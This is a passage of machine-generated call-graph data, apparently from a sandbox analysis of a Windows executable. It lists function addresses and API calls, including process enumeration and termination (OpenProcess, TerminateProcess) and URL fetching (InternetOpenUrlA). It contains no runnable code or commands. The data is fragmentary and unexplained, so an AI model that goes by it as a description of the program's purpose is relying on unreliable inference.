7ff7abc174af 42462->42464 42463->42410 42463->42462 42465 7ff7abc42a38 std::_Facet_Register 50 API calls 42464->42465 42467 7ff7abc174e0 42465->42467 42466->42397 42466->42411 42468 7ff7abc174f0 SysAllocString 42467->42468 42469 7ff7abc17520 42467->42469 42468->42410 42468->42469 42469->42410 42470 7ff7abc17620 VariantClear VariantClear VariantClear 42469->42470 42471 7ff7abc175f7 SysFreeString 42469->42471 42477 7ff7abc17600 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42469->42477 42472 7ff7abc1778e 42470->42472 42473 7ff7abc17666 42470->42473 42471->42477 42474 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42472->42474 42478 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42473->42478 42475 7ff7abc177a5 42474->42475 42475->42410 42476 7ff7abc177dd Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42475->42476 42482 7ff7abc1780c CoUninitialize 42476->42482 42477->42470 42479 7ff7abc17686 42478->42479 42479->42410 42480 7ff7abc176be Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42479->42480 42481 7ff7abc176df CoUninitialize 42480->42481 42481->42397 42481->42411 42482->42397 42482->42411 42484 7ff7abc05db1 42483->42484 42485 7ff7abc05e20 Process32FirstW 42483->42485 42486 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42484->42486 42487 7ff7abc05fe4 CloseHandle 42485->42487 42510 7ff7abc05e40 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42485->42510 42507 7ff7abc05ddc 42486->42507 43778 7ff7abc039d0 42487->43778 42490 7ff7abc24160 50 API calls 42490->42510 42491 7ff7abc42770 codecvt 8 API calls 42493 7ff7abc06119 42491->42493 42492 7ff7abc06180 42494 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42492->42494 42493->41987 42496 7ff7abc06185 42494->42496 42495 7ff7abc039d0 2 API calls 42500 7ff7abc06028 42495->42500 42497 7ff7abc0609f 42498 7ff7abc060bb 42497->42498 42499 7ff7abc0613a 42497->42499 42502 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42498->42502 42501 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42499->42501 42500->42497 42505 7ff7abc06084 Sleep 42500->42505 42501->42507 42502->42507 42503 7ff7abc05f20 OpenProcess 42504 7ff7abc05fce Process32NextW 42503->42504 42503->42510 42504->42487 42504->42510 42506 7ff7abc039d0 2 API calls 42505->42506 42506->42500 42507->42492 42508 7ff7abc05e14 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42507->42508 42508->42491 42509 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42509->42510 42510->42490 42510->42492 42510->42503 42510->42504 42510->42509 42511 7ff7abc05fb0 TerminateProcess CloseHandle 42510->42511 42512 7ff7abc05fab Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42510->42512 42511->42504 42512->42511 42514 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42513->42514 42515 7ff7abc07cba 42514->42515 43785 7ff7abc3e0b4 42515->43785 42522 7ff7abc0846f 43830 7ff7abc04dc0 51 API calls _com_raise_error 42522->43830 42524 7ff7abc3e0b4 __std_fs_code_page 48 API calls 42526 7ff7abc07d7f 42524->42526 42525 7ff7abc08485 42532 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42525->42532 42528 7ff7abc03ab0 52 API calls 42526->42528 42527 7ff7abc07db1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42527->42522 42527->42525 42530 7ff7abc07ea1 42527->42530 42531 7ff7abc083a5 42527->42531 42535 7ff7abc0848b 42527->42535 42541 7ff7abc0845e 42527->42541 42529 7ff7abc07d97 42528->42529 42533 7ff7abc055a0 66 API calls 42529->42533 42534 7ff7abc3e0b4 __std_fs_code_page 48 API calls 42530->42534 43827 7ff7abc26670 10 API calls _com_raise_error 42531->43827 42532->42535 42533->42527 42536 7ff7abc07ec0 42534->42536 42537 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42535->42537 42539 7ff7abc03ab0 52 API calls 42536->42539 42540 7ff7abc08491 42537->42540 42587 7ff7abc07ed9 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42539->42587 43831 7ff7abc04d50 51 API calls _com_raise_error 42540->43831 43829 7ff7abc04d50 51 API calls _com_raise_error 42541->43829 42542 7ff7abc083d2 42546 7ff7abc21dc0 50 API calls 42542->42546 42545 7ff7abc084a5 42547 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42545->42547 42556 7ff7abc08331 42546->42556 42548 7ff7abc084ab 42547->42548 43832 7ff7abc04d50 51 API calls _com_raise_error 42548->43832 42549 7ff7abc0841c Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42550 7ff7abc42770 codecvt 8 API calls 42549->42550 42551 7ff7abc08430 42550->42551 42551->41989 42553 7ff7abc08451 42554 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42553->42554 42558 7ff7abc08456 42554->42558 42555 7ff7abc084bc 42559 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42555->42559 42556->42549 42556->42553 43828 7ff7abc04c60 50 API calls 3 library calls 42558->43828 42561 7ff7abc084c2 42559->42561 42562 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42561->42562 42564 7ff7abc084c8 42562->42564 42565 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42564->42565 42566 7ff7abc084ce 42565->42566 42567 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42566->42567 42568 7ff7abc084d4 CoInitialize CoCreateInstance 42567->42568 42571 7ff7abc08548 42568->42571 42588 7ff7abc085ab Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42568->42588 42570 7ff7abc03f60 56 API calls 42570->42587 42572 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42571->42572 42598 7ff7abc08569 42572->42598 42574 7ff7abc21dc0 50 API calls 42574->42587 42575 7ff7abc0883a 42576 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42575->42576 42578 7ff7abc0883f 42576->42578 42577 7ff7abc42770 codecvt 8 API calls 42579 7ff7abc08823 42577->42579 42581 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42578->42581 42579->41989 42580 7ff7abc08845 42582 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42580->42582 42581->42580 42583 7ff7abc0884b 42582->42583 42584 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42583->42584 42586 7ff7abc08851 42584->42586 42585 7ff7abc24160 50 API calls 42585->42587 42586->41989 42587->42540 42587->42545 42587->42548 42587->42555 42587->42556 42587->42558 42587->42561 42587->42564 42587->42566 42587->42570 42587->42574 42587->42585 43811 7ff7abc04e20 42587->43811 43817 7ff7abc04f80 42587->43817 43825 7ff7abc26670 10 API calls _com_raise_error 42587->43825 43826 7ff7abc27d80 50 API calls 4 library calls 42587->43826 42588->42580 42588->42583 42590 7ff7abc086a9 42588->42590 42591 7ff7abc08716 42588->42591 42592 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42590->42592 42593 7ff7abc0879a CoUninitialize 42591->42593 42594 7ff7abc0873a 42591->42594 42597 7ff7abc086ce Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42592->42597 42593->42598 42596 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42594->42596 42595 7ff7abc08709 CoUninitialize 42595->42598 42596->42597 42597->42578 42597->42595 42598->42575 42599 7ff7abc0859f Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42598->42599 42599->42577 42601 7ff7abc42a38 std::_Facet_Register 50 API calls 42600->42601 42602 7ff7abc1d0fc 42601->42602 42602->42209 42604 7ff7abc10e22 42603->42604 42605 7ff7abc0e7f5 42603->42605 43993 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42604->43993 42607 7ff7abc260e0 50 API calls 42605->42607 42609 7ff7abc0e826 42607->42609 42608 7ff7abc10e28 42611 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42608->42611 42610 7ff7abc208c0 std::_Throw_Cpp_error 50 API calls 42609->42610 42612 7ff7abc0e841 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42610->42612 42613 7ff7abc10e2e 42611->42613 42612->42608 42615 7ff7abc3e0b4 __std_fs_code_page 48 API calls 42612->42615 42614 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42613->42614 42616 7ff7abc10e34 42614->42616 42617 7ff7abc0e915 42615->42617 43994 7ff7abc04dc0 51 API calls _com_raise_error 42616->43994 42618 7ff7abc03ab0 52 API calls 42617->42618 42619 7ff7abc0e93d 42618->42619 42621 7ff7abc055a0 66 API calls 42619->42621 42625 7ff7abc0e95d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42621->42625 42622 7ff7abc10e51 42623 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42622->42623 42624 7ff7abc10e57 42623->42624 43995 7ff7abc04d50 51 API calls _com_raise_error 42624->43995 42625->42613 42625->42616 42627 7ff7abc0eae9 42625->42627 42628 7ff7abc0e9fd 42625->42628 42630 7ff7abc3e0b4 __std_fs_code_page 48 API calls 42627->42630 42631 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42628->42631 42629 7ff7abc10e6e 42634 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42629->42634 42632 7ff7abc0eb20 42630->42632 42650 7ff7abc0ea32 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42631->42650 42633 7ff7abc03ab0 52 API calls 42632->42633 42731 7ff7abc0eb48 __std_exception_destroy memcpy_s Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42633->42731 42636 7ff7abc10e74 42634->42636 42635 7ff7abc0eab4 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42637 7ff7abc42770 codecvt 8 API calls 42635->42637 43996 7ff7abc04d50 51 API calls _com_raise_error 42636->43996 42640 7ff7abc0eacc 42637->42640 42638 7ff7abc10e1d 42641 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42638->42641 42640->42209 42641->42604 42642 7ff7abc10e84 43997 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42642->43997 42644 7ff7abc10e8a 43998 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42644->43998 42646 7ff7abc10e90 43999 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42646->43999 42648 7ff7abc10d51 42648->42650 42733 7ff7abc287b0 48 API calls 42648->42733 42649 7ff7abc10e96 44000 7ff7abc04d50 51 API calls _com_raise_error 42649->44000 42650->42622 42650->42635 42650->42638 42652 7ff7abc04f80 52 API calls 42652->42731 42653 7ff7abc10ead 44001 7ff7abc04dc0 51 API calls _com_raise_error 42653->44001 42654 7ff7abc10fe7 44008 7ff7abc04c60 50 API calls 3 library calls 42654->44008 42657 7ff7abc10fef 42658 7ff7abc10eca 42659 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42658->42659 42661 7ff7abc10ecf 42659->42661 42660 7ff7abc260e0 50 API calls 42660->42731 42662 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42661->42662 42663 7ff7abc10ed5 42662->42663 42664 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42663->42664 42667 7ff7abc10edb 42664->42667 42665 7ff7abc42a38 50 API calls std::_Facet_Register 42665->42731 42666 7ff7abc206d0 50 API calls 42666->42731 44002 7ff7abc449c0 RtlPcToFileHeader RaiseException 42667->44002 42668 7ff7abc3e0b4 48 API calls __std_fs_code_page 42668->42731 42670 7ff7abc03ab0 52 API calls 42670->42731 42671 7ff7abc10f36 42672 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42671->42672 42673 7ff7abc10f3c 42672->42673 42674 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42673->42674 42675 7ff7abc10f42 42674->42675 42676 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42675->42676 42677 7ff7abc10f48 42676->42677 42680 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42677->42680 42678 7ff7abc3e440 66 API calls 42678->42731 42679 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 42679->42731 42681 7ff7abc10f4e 42680->42681 44003 7ff7abc04dc0 51 API calls _com_raise_error 42681->44003 42683 7ff7abc055a0 66 API calls 42683->42731 42684 7ff7abc10f6b 42686 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42684->42686 42685 7ff7abc1fa80 116 API calls 42685->42731 42687 7ff7abc10f71 42686->42687 44004 7ff7abc04dc0 51 API calls _com_raise_error 42687->44004 42688 7ff7abc32ae0 70 API calls 42688->42731 42690 7ff7abc10f8e 44005 7ff7abc04d50 51 API calls _com_raise_error 42690->44005 42693 7ff7abc10fa5 42696 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42693->42696 42694 7ff7abc1f4a0 50 API calls 42694->42731 42695 7ff7abc392e0 58 API calls 42695->42731 42697 7ff7abc10fab 42696->42697 44006 7ff7abc04d50 51 API calls _com_raise_error 42697->44006 42699 7ff7abc10fbb 42702 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42699->42702 42700 7ff7abc10ff0 47 API calls 42700->42731 42701 7ff7abc24160 50 API calls 42701->42731 42704 7ff7abc10fc1 42702->42704 42707 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42704->42707 42706 7ff7abc03f60 56 API calls 42706->42731 42709 7ff7abc10fc7 42707->42709 42708 7ff7abc10fcf 42710 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42708->42710 44007 7ff7abc04c60 50 API calls 3 library calls 42709->44007 42711 7ff7abc10fd5 42710->42711 42714 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42711->42714 42712 7ff7abc10fdb 42716 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42712->42716 42714->42712 42715 7ff7abc10fe1 42717 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42715->42717 42716->42715 42717->42654 42718 7ff7abc37c70 58 API calls 42718->42731 42720 7ff7abc39690 58 API calls 42720->42731 42721 7ff7abc1e550 81 API calls 42721->42731 42723 7ff7abc38e50 50 API calls 42723->42731 42726 7ff7abc05d00 47 API calls 42726->42731 42728 7ff7abc20370 47 API calls 42728->42731 42729 7ff7abc37420 56 API calls 42729->42731 42730 7ff7abc22ee0 50 API calls 42730->42731 42731->42624 42731->42629 42731->42636 42731->42642 42731->42644 42731->42646 42731->42648 42731->42649 42731->42652 42731->42653 42731->42654 42731->42658 42731->42660 42731->42661 42731->42663 42731->42665 42731->42666 42731->42667 42731->42668 42731->42670 42731->42671 42731->42673 42731->42675 42731->42677 42731->42678 42731->42679 42731->42681 42731->42683 42731->42684 42731->42685 42731->42687 42731->42688 42731->42690 42731->42693 42731->42694 42731->42695 42731->42697 42731->42699 42731->42700 42731->42701 42731->42704 42731->42706 42731->42708 42731->42709 42731->42711 42731->42712 42731->42715 42731->42718 42731->42720 42731->42721 42731->42723 42731->42726 42731->42728 42731->42729 42731->42730 43943 7ff7abc1ffc0 42731->43943 43949 7ff7abc287b0 42731->43949 43955 7ff7abc27870 42731->43955 43984 7ff7abc1f300 47 API calls 2 library calls 42731->43984 43985 7ff7abc38500 58 API calls codecvt 42731->43985 43986 7ff7abc37af0 42731->43986 43990 7ff7abc396c0 58 API calls 4 library calls 42731->43990 43991 7ff7abc27d80 50 API calls 4 library calls 42731->43991 43992 7ff7abc28a60 50 API calls std::_Throw_Cpp_error 42731->43992 42733->42650 42735 7ff7abc20922 42734->42735 42736 7ff7abc208e3 memcpy_s 42734->42736 44108 7ff7abc24fa0 50 API calls 6 library calls 42735->44108 42736->42209 42738 7ff7abc20938 42738->42209 42740 7ff7abc42a38 std::_Facet_Register 50 API calls 42739->42740 42741 7ff7abc1ec3d 42740->42741 44109 7ff7abc28af0 42741->44109 42743 7ff7abc1ec63 42743->42209 42743->42743 42745 7ff7abc42a38 std::_Facet_Register 50 API calls 42744->42745 42746 7ff7abc11158 42745->42746 42747 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42746->42747 42748 7ff7abc11199 42747->42748 42749 7ff7abc3e0b4 __std_fs_code_page 48 API calls 42748->42749 42750 7ff7abc111b9 42749->42750 42751 7ff7abc03ab0 52 API calls 42750->42751 42752 7ff7abc111d7 42751->42752 42753 7ff7abc055a0 66 API calls 42752->42753 42755 7ff7abc111ef Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42753->42755 42754 7ff7abc120bf 44198 7ff7abc04dc0 51 API calls _com_raise_error 42754->44198 42757 7ff7abc120d7 42755->42757 42758 7ff7abc3e0b4 __std_fs_code_page 48 API calls 42755->42758 42790 7ff7abc112d1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42755->42790 42844 7ff7abc113c1 memcpy_s Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42755->42844 42760 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42757->42760 42759 7ff7abc11293 42758->42759 42764 7ff7abc03ab0 52 API calls 42759->42764 42765 7ff7abc120dd 42760->42765 42761 7ff7abc1218e 44206 7ff7abc04dc0 51 API calls _com_raise_error 42761->44206 42768 7ff7abc112b1 42764->42768 44199 7ff7abc04dc0 51 API calls _com_raise_error 42765->44199 42766 7ff7abc1139d 44137 7ff7abc205d0 42766->44137 42767 7ff7abc121a7 44207 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42767->44207 44121 7ff7abc05680 42768->44121 42771 7ff7abc12188 44205 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42771->44205 42773 7ff7abc12128 42776 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42773->42776 42780 7ff7abc1212e 42776->42780 42777 7ff7abc120f2 42783 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42777->42783 42778 7ff7abc1217c 42782 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42778->42782 42779 7ff7abc121ad 44208 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42779->44208 44200 7ff7abc02370 50 API calls 3 library calls 42780->44200 42781 7ff7abc12182 42787 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42781->42787 42782->42781 42785 7ff7abc120f8 42783->42785 42784 7ff7abc06190 121 API calls 42784->42844 42793 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42785->42793 42787->42771 42788 7ff7abc1203b 42794 7ff7abc1206d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42788->42794 42806 7ff7abc120ba 42788->42806 42790->42765 42790->42777 44136 7ff7abc26540 50 API calls 5 library calls 42790->44136 42791 7ff7abc120fe 42797 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42791->42797 42792 7ff7abc12134 42804 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42792->42804 42793->42791 42796 7ff7abc23ad0 47 API calls 42794->42796 42799 7ff7abc1208d 42796->42799 42805 7ff7abc12104 42797->42805 42798 7ff7abc12176 42802 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42798->42802 42807 7ff7abc42770 codecvt 8 API calls 42799->42807 42800 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42800->42844 42801 7ff7abc12170 44204 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42801->44204 42802->42778 42803 7ff7abc260e0 50 API calls 42803->42844 42810 7ff7abc1213a 42804->42810 42813 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42805->42813 42808 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42806->42808 42812 7ff7abc1209f 42807->42812 42808->42754 42814 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42810->42814 42812->42209 42816 7ff7abc1210a 42813->42816 42818 7ff7abc12140 42814->42818 42815 7ff7abc205d0 50 API calls 42815->42844 42819 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42816->42819 42817 7ff7abc208c0 50 API calls std::_Throw_Cpp_error 42817->42844 44201 7ff7abc02370 50 API calls 3 library calls 42818->44201 42821 7ff7abc12110 42819->42821 42824 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42821->42824 42822 7ff7abc06970 174 API calls 42822->42844 42823 7ff7abc12146 42826 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42823->42826 42825 7ff7abc12116 42824->42825 42829 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42825->42829 42828 7ff7abc1214c 42826->42828 42827 7ff7abc23880 50 API calls 42827->42844 44202 7ff7abc04d50 51 API calls _com_raise_error 42828->44202 42831 7ff7abc1211c 42829->42831 42830 7ff7abc1216a 42833 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42830->42833 42837 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42831->42837 42833->42801 42835 7ff7abc12164 44203 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42835->44203 42838 7ff7abc12122 42837->42838 42840 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42838->42840 42840->42773 42841 7ff7abc42a38 50 API calls std::_Facet_Register 42841->42844 42842 7ff7abc3e0b4 48 API calls __std_fs_code_page 42842->42844 42843 7ff7abc03ab0 52 API calls 42843->42844 42844->42754 42844->42761 42844->42767 42844->42771 42844->42773 42844->42778 42844->42779 42844->42780 42844->42781 42844->42784 42844->42785 42844->42788 42844->42791 42844->42792 42844->42798 42844->42800 42844->42801 42844->42803 42844->42805 42844->42810 42844->42815 42844->42816 42844->42817 42844->42818 42844->42821 42844->42822 42844->42823 42844->42825 42844->42827 42844->42828 42844->42830 42844->42831 42844->42835 42844->42838 42844->42841 42844->42842 42844->42843 42846 7ff7abc055a0 66 API calls 42844->42846 44145 7ff7abc26540 50 API calls 5 library calls 42844->44145 44146 7ff7abc206d0 42844->44146 44163 7ff7abc08880 118 API calls 5 library calls 42844->44163 44164 7ff7abc3e7c8 42844->44164 42846->42844 42848 7ff7abc23aeb 42847->42848 42849 7ff7abc23b26 42847->42849 44229 7ff7abc27d20 47 API calls Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42848->44229 42852 7ff7abc23060 47 API calls 42851->42852 42853 7ff7abc11008 42852->42853 42854 7ff7abc23060 47 API calls 42853->42854 42855 7ff7abc11014 42854->42855 42856 7ff7abc20370 47 API calls 42855->42856 42857 7ff7abc1101d 42856->42857 42858 7ff7abc20370 47 API calls 42857->42858 42859 7ff7abc11026 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42858->42859 42860 7ff7abc1109f Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42859->42860 42861 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42859->42861 42860->42209 42862 7ff7abc110c5 42861->42862 42864 7ff7abc24286 42863->42864 42868 7ff7abc24186 42863->42868 44231 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42864->44231 42867 7ff7abc24280 44230 7ff7abc02370 50 API calls 3 library calls 42867->44230 42868->42867 42869 7ff7abc241ea 42868->42869 42870 7ff7abc2423e 42868->42870 42875 7ff7abc24191 memcpy_s 42868->42875 42869->42867 42873 7ff7abc42a38 std::_Facet_Register 50 API calls 42869->42873 42872 7ff7abc42a38 std::_Facet_Register 50 API calls 42870->42872 42872->42875 42874 7ff7abc241ff 42873->42874 42874->42875 42876 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42874->42876 42875->42023 42876->42867 42878 7ff7abc061ae std::_Locinfo::_Locinfo_ctor 42877->42878 42879 7ff7abc061f2 42878->42879 42880 7ff7abc062f7 42878->42880 42881 7ff7abc06756 42879->42881 42884 7ff7abc260e0 50 API calls 42879->42884 42885 7ff7abc206d0 50 API calls 42880->42885 42893 7ff7abc0624c Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42880->42893 44243 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42881->44243 42882 7ff7abc06750 44242 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42882->44242 42889 7ff7abc06234 42884->42889 42885->42893 42886 7ff7abc260e0 50 API calls 42895 7ff7abc06360 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42886->42895 42888 7ff7abc0675c 42891 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42888->42891 42890 7ff7abc208c0 std::_Throw_Cpp_error 50 API calls 42889->42890 42890->42893 42892 7ff7abc06762 42891->42892 42897 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42892->42897 42893->42882 42893->42886 42893->42888 42893->42892 42894 7ff7abc06768 42898 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42894->42898 42895->42882 42895->42894 42896 7ff7abc260e0 50 API calls 42895->42896 42899 7ff7abc063e1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42896->42899 42897->42894 42900 7ff7abc0676e 42898->42900 42899->42894 42901 7ff7abc0641d InternetOpenA 42899->42901 42902 7ff7abc06442 42901->42902 42903 7ff7abc064b1 InternetOpenUrlA 42901->42903 42906 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42902->42906 42904 7ff7abc064e3 42903->42904 42905 7ff7abc06552 42903->42905 42907 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42904->42907 44232 7ff7abc49edc 42905->44232 42930 7ff7abc0646b Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42906->42930 42911 7ff7abc0671d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42919 7ff7abc0674b 42930->42894 42930->42911 42930->42919 44725 7ff7abc0a810 43103->44725 43105 7ff7abc0b651 43106 7ff7abc21dc0 50 API calls 43105->43106 43172 7ff7abc0b66d std::_Locinfo::_Locinfo_ctor Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43106->43172 43580->42209 43581->42209 43582->42209 45111 7ff7abc39dc0 43583->45111 43585 7ff7abc38e73 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43585->42209 43586->42209 43588 7ff7abc1f50e 43587->43588 43590 7ff7abc1f55a 43588->43590 43592 7ff7abc1f52a memcpy_s 43588->43592 43594 7ff7abc1f5b2 43588->43594 43600 7ff7abc1f5ed 43588->43600 43593 7ff7abc42a38 std::_Facet_Register 50 API calls 43590->43593 43596 7ff7abc1f5e7 43590->43596 43592->42209 43595 7ff7abc1f570 43593->43595 43597 7ff7abc42a38 std::_Facet_Register 50 API calls 43594->43597 43595->43592 43599 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43595->43599 45115 7ff7abc02370 50 API calls 3 library calls 43596->45115 43597->43592 43599->43596 45116 7ff7abc02410 50 API calls std::_Throw_Cpp_error 43600->45116 43601->42209 43602->42209 43603->42209 43605 7ff7abc20381 43604->43605 43607 7ff7abc2038a Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43604->43607 45117 7ff7abc246a0 47 API calls 2 library calls 43605->45117 43607->42209 43614->42005 43621 7ff7abc1797c K32EnumProcesses 43620->43621 43621->42255 43621->42264 43623 7ff7abc21de8 43622->43623 43628 7ff7abc25b90 43623->43628 43625 7ff7abc21e34 43644 7ff7abc21160 43625->43644 43627 7ff7abc21e3c 43627->42257 43629 7ff7abc25bc1 43628->43629 43630 7ff7abc21160 10 API calls 43629->43630 43631 7ff7abc25bd6 43629->43631 43630->43631 43633 7ff7abc25ca8 43631->43633 43635 7ff7abc25cdd 43631->43635 43632 7ff7abc25cb9 43632->43625 43633->43632 43659 7ff7abc212c0 RtlPcToFileHeader RaiseException _com_raise_error 43633->43659 43660 7ff7abc449c0 RtlPcToFileHeader RaiseException 43635->43660 43637 7ff7abc25d30 43638 7ff7abc2652f 43637->43638 43639 7ff7abc262f3 43637->43639 43674 7ff7abc3eec4 50 API calls 2 library calls 43638->43674 43661 7ff7abc20e30 43639->43661 43643 7ff7abc2632a std::_Locinfo::_Locinfo_ctor 43643->43625 43645 7ff7abc21220 43644->43645 43646 7ff7abc2119e 43644->43646 43648 7ff7abc42770 codecvt 8 API calls 43645->43648 43676 7ff7abc1f970 10 API calls 43646->43676 43650 7ff7abc2124e 43648->43650 43649 7ff7abc211ab 43651 7ff7abc2120d 43649->43651 43653 7ff7abc21263 43649->43653 43650->43627 43651->43645 43677 7ff7abc212c0 RtlPcToFileHeader RaiseException _com_raise_error 43651->43677 43678 7ff7abc449c0 RtlPcToFileHeader RaiseException 43653->43678 43655 7ff7abc21309 43655->43627 43656 7ff7abc212b6 43656->43655 43679 7ff7abc449c0 RtlPcToFileHeader RaiseException 43656->43679 43658 7ff7abc21360 43659->43632 43660->43637 43662 7ff7abc20e5c 43661->43662 43673 7ff7abc20efb Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43661->43673 43663 7ff7abc20f62 43662->43663 43665 7ff7abc20eb7 43662->43665 43666 7ff7abc20e8e 43662->43666 43667 7ff7abc20e81 43662->43667 43675 7ff7abc02370 50 API calls 3 library calls 43663->43675 43669 7ff7abc42a38 std::_Facet_Register 50 API calls 43665->43669 43666->43663 43668 7ff7abc20e9b 43666->43668 43671 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43667->43671 43667->43673 43670 7ff7abc42a38 std::_Facet_Register 50 API calls 43668->43670 43669->43667 